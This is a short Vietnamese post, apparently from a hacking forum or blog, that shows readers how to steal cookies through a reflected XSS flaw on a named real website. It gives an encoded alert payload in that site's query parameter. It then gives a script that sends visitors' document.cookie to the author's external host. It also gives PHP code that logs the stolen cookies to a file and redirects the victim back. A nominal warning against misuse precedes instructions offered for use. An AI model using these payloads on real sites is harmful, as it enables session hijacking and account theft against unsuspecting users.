Ví dụ chôm Cookie bằng lỗ hổng XSS

Lũ ăn không ngồi rồi đừng dùng đi phá người khác nghe chưa!!!

  Demo tấn công: shopacc24h.vn (chắc fix rồi)

Truy cập

https://shopacc24h.vn/?sapxep=

Kèm theo đoạn script đã được encode sẽ thấy lỗi Xss

%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3Ehttps://shopacc24h.vn/?sapxep=%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E

Ngoài ra, chia sẻ thêm cho anh em cách chôm cookie: 

Cứ như trên, chèn đoạn script này vào (encode trước khi chèn vào)

<script>
window.location="http://kodoku.tk/test.php?cc="+document.cookie+"&url=http://shopacc24h.vn";
</script>

Sau khi người dùng truy cập đường dẫn, nó sẽ Location đến 1 web mình đã tạo, kèm parameter "cc" và "url". Vậy là tại trang kodoku.tk/test.php ae code 1 đoạn code nhỏ như sau để lưu cookie và location ngược lại url main!

<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, 'a+');
$bien='Cookie: '.$_REQUEST['cc']."|Location: ".$_REQUEST['url']."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location='".$_REQUEST['url']."';</script>");
?>

Vậy là cookie của người click link trên đã lưu lại vào file cookie.txt 

Nguồn: kodoku-san